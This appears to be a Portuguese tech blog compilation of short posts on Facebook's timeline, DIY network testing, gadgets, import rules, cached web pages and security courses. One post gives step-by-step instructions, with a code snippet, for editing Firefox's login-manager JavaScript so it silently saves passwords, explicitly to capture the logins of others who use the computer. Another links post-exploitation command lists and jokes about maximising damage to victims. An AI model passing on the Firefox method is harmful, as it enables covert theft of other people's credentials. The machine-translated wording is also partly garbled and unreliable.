Ative o novo visual do Facebook

Veja, abaixo, como acessar a nova timeline do Facebook:

1 – Após fazer login na rede, faça uma busca por “developer mode” e instale o app para desenvolvedores em seu perfil. Depois, clique no botão “criar um novo app” e dê um nome qualquer ao seu suposto aplicativo. Para seguir adiante, será necessário “validar” sua conta no Facebook.

 

Confirmar telefone na rede social Facebook

2 – Para validar sua conta, o próprio Facebook pedirá que você insira um número de celular (com DDI, no caso do Brasil 55 e DDD da sua região). Um SMS será enviado para seu celular com uma senha para validar a conta (imagem ao lado).

3 – Uma vez cadastrado como desenvolvedor, vá até o menu “Open Graph” e clique em “Getting Started”. Digite algumas palavras descrevendo uma suposta ação que você deseja testar em seu app, algo como “teste timeline” ou “teste recurso”. Quaisquer palavras são validar.

4 – Faça algumas alterações nas configurações do app. O Facebook exibe ao menos três telas de configurações, que devem ser preenchidas, ainda que com qualquer conteúdo.

5 – Este procedimento deverá fazer o Facebook enviar para sua conta um convite para testar a nova timelime da rede social. De acordo com vários relatos no Twitter, o convite pode levar alguns minutos para chegar à sua conta. Pode ser necessário fazer log off e login para ver o convite.

Hack Firefox Para Auto Save Passwords sem notificação

Aqui está um breve tutorial sobre como obter o Firefox para guardar nomes de usuário + senhas automaticamente com todas as notificações (Mais ou menos como um keylogger) apenas editando um dos arquivos JavaScript.

ideal se você deseja obter detalhes de login de alguém que usa seu computador.

1) Primeiro você precisa fechar o firefox.

2) Agora, localize a nsloginmanagerprompter.js que é normalmente encontrada em
C: \ Arquivos de Programas \ MozillaFirefox \ Components \

3) Abra nsloginmanagerprompter.js com o notepad + +

4) Substitua toda a linha 804-869 com o seguinte código

var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);

Quando você tiver feito isso “salvar como ” em seu desktop, então arraste de volta para a pasta original e substituir o arquivo.

Agora o seu feito entrar em firefox e experimentá-lo 😀

Para ver os nomes de usuário + senha que você precisa clicar em Ferramentas na parte superior do seu navegador e vá para a página de informações, em seguida, de segurança.

Eles serão salvos na seção senhas salvas.

Fonte:Hackerime

Gambiarra Session: Testador de placa de rede caseiro

Com Este Teste Você poderá verificar se a Placa de rede esta Funcionando e Com os Drivers Instalados.

Esquema:

https://i0.wp.com/www.inventeaqui.com.br/sites/default/files/imagecache/imagens_reduzidas/juliovga/esquema_teste_rede.jpg

Foto:

https://i0.wp.com/www.inventeaqui.com.br/sites/default/files/imagecache/imagens_reduzidas/juliovga/foto_teste_rede.jpg

Materiais:

*Apenas um conector RJ45

*2 Pedaços Pequenos de FIO

*Alicate  de Crimpagem

No Windows, ao Plugar o teste a Conexão ficará ativa, mostrando que a Placa esta OK e os Drivers estão instalados.

Pode-se Fazer o Teste do Ping no Prompt, e pingar no Proprio IP.

Digite no Executar: “CMD”

Depois: “ping 192.168.xx.xx” (seu IP), se retornar o Ping, tudo OK.

Fonte: IventeAqui

Stormtrooper Motorcycle Armor – Andar de moto radical!

Como estou sem tempo, traduzi o texto usando o google translate:

Esta armadura motocicleta stormtrooper da UD Replicas que você vê na imagem parece incrível, que a forma de uma roupa de Stormtrooper. Ele é feito de couro de grau A, um terno será fixado de volta $ 1.143. características:
– Incrível atenção aos detalhes, com pormenores forma moldada como nunca antes.
– Raised costela detalhando nas mangas, ombros, pernas, tronco e cintura perfeitamente replicando o visual da armadura rígida.
– Ajustável antebraços, bíceps, coxas e canelas armadura de couro permitem um ajuste do corpo personalizado ‘custom’.
– Cinto da cintura é parte do casaco e não removível. Escondidos é o zíper da frente principal, que tem 3 pontos de acesso principal função fornecer, ao mesmo tempo permitindo que a armadura do tronco principal a ser descomprometido e fiel ao que foi visto na tela.
– Botões de pressão nos punhos e zíperes pulso.
– Jaqueta e calças zip juntos na cintura essencialmente converter isso para um traje de uma peça.
– Removível forro de algodão acolchoado.
– CE-aprovado armadura nos ombros, antebraços / cotovelo, costas coluna protetor, coxas e joelhos / shin armadura é padrão para os pilotos, mas é facilmente removido para o dia-a-dia de desgaste.

Stormtrooper Motorcycle Armor


Price: $1,143   |   BUY
Fonte: LikeCool

Invandiu uma maquina? E agora, o que fazer? Veja!

Texto do Gustavo , do Coruja de TI

Essa é a pergunta que muito analista de segurança faz após de ter conseguido a façanha de invadir uma máquina e capturar o seu shell. Eu já li diversos textos quanto a isso e uma porrada de comandos, tudo separado, que vocês poderão executar para capturar ou causar o máximo de estrago na vítima, heheheh.

Acontece que muita gente, como eu, possui isso anotado e espalhado pelo micro, Eis que o mubix, um dos caras que mais manjam sobre metasploit, segurança e que auxilia a galera do excelente programa Hak5, disponibilizou 3 excelentes papers com a compilação de diversos comandos que poderão ser executados nos 3 mundos/vítimas: Linux, Windows e Mac.

Vamos à eles:

Linux/Unix/BSD Post Exploitation:

https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US

Windows Post Exploitation:

https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US

and newly added OSX Post Exploitation:

https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit?hl=en_US

Dica, guardem esse material com vocês, pois ele será de grande valia, eu garanto.

Vai viajar? Entenda as regras de importação de produtos

Novas regras de importação

Antes, alguns produtos já não eram tarifados, como livros e roupas, e o que fosse diferente disso entrava no regime de tarifação de excesso de cota, caso ultrapassasse o valor de US$ 500,00. A diferença agora é basicamente a isenção do imposto para objetos comprovadamente de uso pessoal e profissional, incluindo aí aparelhos eletrônicos (não todos).

Só que muita gente interpretou o tal “uso pessoal e profissional” como oba-oba. “Ah! O meu X-BOX é pra meu próprio uso, então posso trazer”. WRONG! O uso pessoal e/ou profissional da lei está especificando o seu uso lá fora, enquanto está viajando, sacou? Então, por exemplo, você pode alegar que comprou uma câmera digital para fazer as fotos da viagem e por isso, pode trazê-la, desde que esteja usada e apenas uma unidade (viu, espertão?). Um condicionador de ar vai ser bem complicado provar que você precisou dele.

Então vamos lá, entender rapidinho o que você pode e o que não pode trazer, dentro dessas novas regras, considerando a isenção.

O que você pode trazer com isenção

  • Livros, folhetos e periódicos;
  • Roupas, calçados, óculos, de uso pessoal;
  • Câmera digital, relógio, telefone celular, desde que usados e apenas 1 unidade de cada;
  • Outros produtos eletrônicos, como iPods, desde que usados, apenas em 1 unidade de cada e que não seja necessária nenhuma instalação do mesmo para que ele funcione;

O que você não pode trazer com isenção

  • Notebooks, tablets e filmadoras, mesmo comprovando o uso profissional;
  • Veículos automotores em geral (via terrestre, aquática ou aéreo), ou peças desses veículos (motor, por exemplo);
  • Qualquer produto, mesmo que se enquadre na isenção, que esteja em quantidade acima dos limites quantitativos estabelecidos pela receita (abaixo).

Limites quantitativos

  • Bebidas: 12 litros
  • Cigarros: 10 maços com 20 und cada / Charutos ou Cigarrilhas: 25 und/ Fumo: 250 g
  • Souvenirs e presentes, de valor inferior a US$10,00 cada: 20 und, no máximo 10 idênticos
  • Souvenirs e presentes de valor superior: 20 und, com no máximo 3 idênticos

Fora a isenção por categoria de produto, o viajante continua tendo o direito de importar dentro do limite de US$ 500,00 sem taxação. Acima disso, o importo é de 50% do valor que exceder a cota.

Receita Federal montou um FAQ para tirar as principais dúvidas. Recomendo.

Fonte: Link1

Lança mísseis controlado por Smartphone

Como matar aqueles momentos de tédio profundo no escritório? O seu patrão vai sugerir que você trabalhe, mas muito mais divertido é armar uma guerra de mísseis com seus colegas!

iLaunch Thunder é um lançador de mísseis controlado via iPhone, iPod Touch ou iPad usando conexão Bluetooth. O iLaunch Thunder lança mísseis de espuma, parecidos com as balas Nerf, e pode ser controlado de uma distância máxima de 7,6 metros usando qualquer gadget rodando iOS.

O lança mísseis iLaunch Thunder custa US$82 na USB Brando.

Veja um video do brinquedinho em ação:

Fonte:DigitalDrops

Acessando site em Cache

Algumas vezes o internauta percebe que certo site foi modificado e gostaria de ver como ele era antes da alteração. Uma primeira abordagem é usar o serviço gratuito “Internet Archive — Wayback Archive”, um grande arquivo que armazena versões antigas de sites. Acessando o endereço www.archive.org/web/web.php, digite, por exemplo, o antigo endereço completo do site de O GLOBO www.oglobo.com.br e clique em “Take Me Back”. Como nosso site é bem tradicional, o arquivo guarda páginas antigas, de 1996, apresentando uma linha de tempo. Para cada ano, ele assinala com círculos azuis as datas em que foram tiradas “fotos” do site para fins históricos. Essa ferramenta funciona para a maior parte dos sites.

Já a segunda abordagem serve apenas para alterações recentes num site, realizadas apenas algumas horas ou dias antes. Este método se baseia na “aranha” que o Google usa para vasculhar a teia da internet. O Google percorre a rede de tempos em tempos e vai capturando instantâneos dos sites. Os mais movimentados e dinâmicos são varridos a intervalos menores (horas), já os pouco modificados são percorridos a intervalos maiores (dias). O buscador guarda os resultados dessa varredura numa área de armazenamento temporário chamada “cache”.

Para usar este segundo método, entre no Google e digite o endereço de um site conhecido, por exemplo, o do Museu de Arte Contemporânea. Você deve digitar o link não na área de endereços, mas sim nas palavras de busca do Google. O link é www.macniteroi.com.br. Logo depois de clicar no botão de busca, a página de resultados trará o site informado logo no topo da lista. Mova o mouse sobre o resultado e veja surgir à direta dele um sinal “>>”. Para o mouse ou clique sobre este sinal.

Surgirá à direita uma versão pequena da página do Museu. Sobre esta imagem, aparecerão um título e alguns links. Clique em “Cached” ou “Em cache”, e surgirá a versão que o Google guardou mais recentemente, numa página cujo cabeçalho informa a data e a hora em que foi capturado o cache.

Fonte: OGLOBO

Cursos focados em segurança ministrados pelos professores de Stanford e Barkeley

As universidades de Stanford e Barkeley, nos EUA, possuem uma inciativa bem interessante de promover cursos sobre segurança da informação e criptografia à distância e gratuitos.

O pessoal da lista exploit-br disponibilizou os dois links dos cursos que possuem turmas em aberto para o ano de 2012.

Caso você tenha ficado interessado, acesse os links abaixo para preencher o cadastro de interesse:

http://www.crypto-class.org/
http://www.security-class.org/

Pelo que eu andei lendo e pesquisando, ambos os cursos são excelentes e indicados para aqueles que desejam aprender mais sobre ambos os tópicos, segurança e criptografia, mas vai um aviso, você precisa entender e muito bem a língua inglesa para aproveitar ao máximo o que será ministrado.

Eu já me inscrevi.. :)